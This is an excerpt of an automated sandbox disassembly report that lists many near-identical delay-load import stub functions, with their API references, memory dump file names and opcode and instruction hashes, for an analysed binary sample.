Instruction ID: 056dab2e3f810640a2e06d3c5409f54bb3cf280053e52592a1effd2cd6aa288e
Opcode Fuzzy Hash: 9db194345673a9526baa7c93aca40df39262801a99375e96fc2e80d683a8b31e
Instruction Fuzzy Hash: 82B012E5258010AC3144B1051E42D3701CFC1C3B20330403EF80AC0180DC46AD120C71

Function 006AE546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE51F

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

2j, xrefs: 006AE519

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 2j
API String ID: 1269201914-2714872843
Opcode ID: 84e40047956f50e6b17956245b4c00accdd1e405f4a5a737ed8d2e68928d8498
Instruction ID: 2f0dc9de32cbe7455b87a94459aa2b3f3f5a577af067f10c7c9ba86c0ebc82aa
Opcode Fuzzy Hash: 84e40047956f50e6b17956245b4c00accdd1e405f4a5a737ed8d2e68928d8498
Instruction Fuzzy Hash: CBB012C1A585007C324475496D03D3B090FC1C3F24330422FF409C0180EC420C450C35

Function 006AE532 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE51F

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

2j, xrefs: 006AE519, 006AE532

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 2j
API String ID: 1269201914-2714872843
Opcode ID: 3416c9755d308255c0c5e696149a962e88bc3526337c78773a7629da1b3be30a
Instruction ID: 9c00e94b857365e5311a45c59098440a453e1c935ce55270d723fae8445add67
Opcode Fuzzy Hash: 3416c9755d308255c0c5e696149a962e88bc3526337c78773a7629da1b3be30a
Instruction Fuzzy Hash: FAB012C1A5C4007D314475492D02E3B050FC1C3F24330402FF409C01C0EC420C010C35

Function 006AE50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE51F

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

2j, xrefs: 006AE519

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 2j
API String ID: 1269201914-2714872843
Opcode ID: 0367e5dda8ad51819f380a5d964a7d6ff7765d63b026733c2ecc6c7cb3b3bcfe
Instruction ID: 338fba71d3573a2f8dc343d8a0d35caf9b0c1ab3768cb97ef2fad6635aa45f0d
Opcode Fuzzy Hash: 0367e5dda8ad51819f380a5d964a7d6ff7765d63b026733c2ecc6c7cb3b3bcfe
Instruction Fuzzy Hash: 1DB012C1A594007C310439652D06D3B050FC1C3F24330403FF415C0585AC424D050C35

Function 006AE27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: f8748d59ab1b0cca876e19c43a68d6eee3727bc5795fdc78579f7b614bc4ac97
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: f8748d59ab1b0cca876e19c43a68d6eee3727bc5795fdc78579f7b614bc4ac97
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: bfce6abd6a9c84cba55191ce48e74b47da6a7d15e1ced5a4dccf47a472a23ab2
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: bfce6abd6a9c84cba55191ce48e74b47da6a7d15e1ced5a4dccf47a472a23ab2
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: f20847bb23f61b997e3ea0903c92f9a15875c2b7d2a7448450b2b3dd3da72ea5
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: f20847bb23f61b997e3ea0903c92f9a15875c2b7d2a7448450b2b3dd3da72ea5
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 6a204c3cad0a25c29ddd7b62dde74420c2afb632c4a39b4eab4e010225421f0c
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: 6a204c3cad0a25c29ddd7b62dde74420c2afb632c4a39b4eab4e010225421f0c
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: ccea981deccea5347b18024fdeeb9239c3469b1fd4e29a0d1040ab697c363b8f
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: ccea981deccea5347b18024fdeeb9239c3469b1fd4e29a0d1040ab697c363b8f
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: c15a42133283bc06eec0bb7bf8fd1a528309b552bb0c878c4dfe5d9fc8e6a01e
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: c15a42133283bc06eec0bb7bf8fd1a528309b552bb0c878c4dfe5d9fc8e6a01e
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: a6b5088d4bb37d131358406351ddeeb669c697f762285f4e03cc006d8d49174b
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: a6b5088d4bb37d131358406351ddeeb669c697f762285f4e03cc006d8d49174b
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 62e48822644242f0d12315510b819d79550814132ccf7e9b9bc4d0f45e750a14
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: 62e48822644242f0d12315510b819d79550814132ccf7e9b9bc4d0f45e750a14
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: ceca7bcb5515f823303ff9a7572205b7d92c4097ad2846dbe9c9665d782803d6
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: ceca7bcb5515f823303ff9a7572205b7d92c4097ad2846dbe9c9665d782803d6
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: ba00ed4ec209419352dc9b4f6942f31f472b2f5172a8bfd11ec94e2573cc05ef
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: ba00ed4ec209419352dc9b4f6942f31f472b2f5172a8bfd11ec94e2573cc05ef
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 6b0a7f819a6add8b7116a68497bd4af00c60f5e1fe7d2b1ff5aa1512b8de18c6
Instruction ID: 5cc01922fd0ea5c555f2c15b1439a9c9dab4ace323b2cb7c5086d4b1ab6cb30a
Opcode Fuzzy Hash: 6b0a7f819a6add8b7116a68497bd4af00c60f5e1fe7d2b1ff5aa1512b8de18c6
Instruction Fuzzy Hash: FAA011EA2A8002BC300832022C82C3B020FC0C2B20330882EF80BC0080A88A2C020CB0

Function 006AE569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE51F

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

2j, xrefs: 006AE519

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 2j
API String ID: 1269201914-2714872843
Opcode ID: 0a4c484a45c64a653022af5b50530d002ecc5ea88f9461f69573b41232bccade
Instruction ID: aa7ca2b07cec4814a1bd0479037a0c21df3f79e5e5ce5f5c5cee175d12b44d5b
Opcode Fuzzy Hash: 0a4c484a45c64a653022af5b50530d002ecc5ea88f9461f69573b41232bccade
Instruction Fuzzy Hash: 4AA011C2AA8802BC300832822E02C3B020FC0C3F28330882EF80AC0080A8820C020C30

Function 006AE541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE51F

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

2j, xrefs: 006AE519

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 2j
API String ID: 1269201914-2714872843
Opcode ID: 5e294417475fa9ccfc96ab376db2e8bf88e857038c492588a20956d033cd74eb
Instruction ID: aa7ca2b07cec4814a1bd0479037a0c21df3f79e5e5ce5f5c5cee175d12b44d5b
